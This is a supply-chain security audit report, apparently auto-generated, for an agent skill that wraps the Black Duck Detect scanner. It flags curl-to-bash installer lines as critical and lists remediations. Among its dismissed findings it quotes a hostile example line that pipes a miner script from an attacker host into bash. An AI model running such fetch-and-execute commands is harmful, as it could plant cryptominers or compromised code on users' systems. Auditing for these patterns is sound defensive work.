Versioned security assessment

Report ID: SA-B3986E61

7/5/2026, 3:25:48 AM

sca-blackduck security assessment v7

Skill Security Certification Report

Audit History
Audit model: codex Historical report
Skill name
sca-blackduck
Version
v7
Maintainer
AgentSecOps
Coverage
14 Files scanned · 4,871 Lines analyzed
Policy version
Unavailable

Highest confirmed finding severity

Critical

2 confirmed security findings require attention.

Installation context

Historical evidence

This report may not describe the currently installable artifact. Open the current Skill page for install guidance.

Open current Skill page

This report does not block or authorize the manifest or ZIP.

Most static findings are false positives from Markdown examples, references, CI variables, and defensive rule templates. I confirmed remote script execution risks where reusable documentation and CI templates use curl-to-shell or bash process substitution without pinning or checksum verification. No prompt injection text was found.

Report position

Historical report

Open audit history before using this report to install.

Audit attestation

Not attestable

The required immutable binding is incomplete.

Human verification

Not verified

No human verification is recorded for this report.

Coverage

14 Files scanned · 4,871 Lines analyzed

15 items shown for review

Limitations

This report does not claim runtime or sandbox execution and does not prove the absence of side effects.

Evidence chain

Follow the evidence from source binding to the install contract. Available evidence supports verification; it is not a safety guarantee.

  1. Source

    Binding unavailable

  2. Artifact

    Identity incomplete

  3. Audit

    Complete

  4. Install contract

    Open manifest to verify

    Open manifest

Capabilities observed

Observed means this report recorded supporting evidence. Not recorded does not prove that a capability is absent.

Contains scripts

May execute code included with the Skill.

Observed in 4 evidence locations

Network access

May connect to external services.

Observed in 54 evidence locations

Filesystem access

May read or write local files.

Observed in 5 evidence locations

Env variables

May read values from the process environment.

Observed in 25 evidence locations

External commands

May invoke commands or programs outside the Skill.

Observed in 62 evidence locations

Capability review items (13)
Critical
Hardcoded URL
curl -s -L https://detect.synopsys.com/detect.sh | bash -- \
The reusable CI template downloads an installer script from the internet and executes it directly in the build environment. This creates a supply chain risk because the script is not pinned or integrity verified.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The reusable CI template downloads an installer script from the internet and executes it directly in the build environment. This creates a supply chain risk because the script is not pinned or integrity verified.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The reusable CI template downloads an installer script from the internet and executes it directly in the build environment. This creates a supply chain risk because the script is not pinned or integrity verified.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The reusable CI template downloads an installer script from the internet and executes it directly in the build environment. This creates a supply chain risk because the script is not pinned or integrity verified.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The reusable CI template downloads an installer script from the internet and executes it directly in the build environment. This creates a supply chain risk because the script is not pinned or integrity verified.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The reusable CI template downloads an installer script from the internet and executes it directly in the build environment. This creates a supply chain risk because the script is not pinned or integrity verified.
Critical
Hardcoded URL
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
The reusable CI template downloads an installer script from the internet and executes it directly in the build environment. This creates a supply chain risk because the script is not pinned or integrity verified.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The skill documentation tells users to run Black Duck Detect through bash process substitution from a remote URL. That downloads and executes mutable internet-hosted code without pinning or checksum verification.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The skill documentation tells users to run Black Duck Detect through bash process substitution from a remote URL. That downloads and executes mutable internet-hosted code without pinning or checksum verification.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The skill documentation tells users to run Black Duck Detect through bash process substitution from a remote URL. That downloads and executes mutable internet-hosted code without pinning or checksum verification.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The skill documentation tells users to run Black Duck Detect through bash process substitution from a remote URL. That downloads and executes mutable internet-hosted code without pinning or checksum verification.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The skill documentation tells users to run Black Duck Detect through bash process substitution from a remote URL. That downloads and executes mutable internet-hosted code without pinning or checksum verification.
Critical
Hardcoded URL
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
The skill documentation tells users to run Black Duck Detect through bash process substitution from a remote URL. That downloads and executes mutable internet-hosted code without pinning or checksum verification.

Risk findings

Confirmed security concerns are separated from items that still need review.

Confirmed security concerns (2)

RISK-001 Critical
Pipe to shell pattern
curl -s -L https://detect.synopsys.com/detect.sh | bash -- \
The reusable CI template downloads an installer script from the internet and executes it directly in the build environment. This creates a supply chain risk because the script is not pinned or integrity verified.
RISK-002 Critical
Pipe to shell pattern
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
The reusable CI template downloads an installer script from the internet and executes it directly in the build environment. This creates a supply chain risk because the script is not pinned or integrity verified.

Remediation

Suggested fixes recorded by this audit. Applying them is the maintainer’s responsibility.

  1. FIX-001
    Critical
    Remote installer scripts are executed directly from URLs.
    Replace curl-to-shell patterns with pinned releases, verified checksums, or vendor actions that are pinned to immutable versions.
  2. FIX-002
    Critical
    Reusable CI templates depend on mutable internet-hosted installers.
    Download tools in a controlled build image or cache, verify integrity, and document approved outbound domains.
  3. FIX-003
    Medium
    CI examples use platform tokens for comments and security uploads.
    Keep minimum permissions, avoid printing tokens, and split read-only scans from write-capable reporting jobs.

Expert evidence

Immutable subject identity, scanner metadata, dismissed matches, and source-level evidence.

Artifact subject

Marketplace commit
Unavailable
Content hash
Unavailable
Tree hash
Unavailable
Skill path
Unavailable
Audit payload hash
Unavailable

Analysis metadata

Audit model: codex

Analysis state: Complete

Scope is limited to the recorded files, lines, methods, and evidence. No runtime or sandbox execution is claimed.

Static false positives ignored (10)
Critical
Metasploit framework
- Exploit availability (PoC, Metasploit module, etc.)
Force-confirmed blocker/critical static finding; AI dismissal overridden.
Critical
Pipe to shell pattern
exec('curl http://attacker.com/miner.sh | bash');
Force-confirmed blocker/critical static finding; AI dismissal overridden.
High
C2 keywords
- **T1041**: Exfiltration Over C2 Channel
Force-confirmed blocker/high static finding; AI dismissal overridden.
High
Malware type keywords
1. **Compromised Dependencies** - Legitimate packages backdoored by attackers
Force-confirmed blocker/high static finding; AI dismissal overridden.
High
Malware type keywords
- Backdoor installation
Force-confirmed blocker/high static finding; AI dismissal overridden.
High
Malware type keywords
// Backdoor
Force-confirmed blocker/high static finding; AI dismissal overridden.
High
Malware type keywords
- **SolarWinds (2020)**: Build system compromise led to trojanized software updates
Force-confirmed blocker/high static finding; AI dismissal overridden.
High
Non-standard PyPI index
pip install --index-url https://pypi.internal.company.com package-name
Force-confirmed blocker/high static finding; AI dismissal overridden.
High
Malware type keywords
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
Force-confirmed blocker/high static finding; AI dismissal overridden.
High
Malware type keywords
- Backdoored dependencies
Force-confirmed blocker/high static finding; AI dismissal overridden.

Verify and export

The manifest and lockfile bind install artifacts to cryptographic hashes. This integrity claim is separate from the security assessment.

Audit attestation: not_attestable